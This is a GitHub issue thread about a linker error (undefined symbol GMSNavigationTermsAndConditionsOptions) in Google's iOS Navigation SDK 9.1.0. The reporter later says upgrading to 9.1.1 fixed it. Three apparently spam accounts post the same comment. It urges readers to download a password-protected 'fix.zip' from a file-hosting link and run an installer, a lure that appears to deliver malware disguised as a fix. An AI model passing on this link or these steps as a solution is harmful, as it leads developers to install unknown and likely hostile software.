### ISSUE TITLE
Got the error Undefined symbol: _OBJC_CLASS_$_GMSNavigationTermsAndConditionsOptions

### ISSUE THREAD

**Issue by tanhuynhngoc-agilityio** [googlemaps/ios-navigation-sdk#11]
During building iOS project process,  I got the error **Undefined symbol: _OBJC_CLASS_$_GMSNavigationTermsAndConditionsOptions** when invoked the method used to show terms and condition dialog if needed.

#### Environment details

1. Xcode Version 15.4
2. SwiftUI
3. iOS Navigation SDK version 9.1.0(injected by Package Dependencies tool)

#### Code example

```
func requestTermsAndConditions() {
        GMSNavigationServices.showTermsAndConditionsDialogIfNeeded(with: .init(companyName: "companyNameABC")) { termsAccepted in
            // TODO: Not Implemented
        }
    }
```

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tanhuynhngoc-agilityio** [comment]
Updated:
Upgraded iOS Navigation SDK to version 9.1.1 solved this issue.
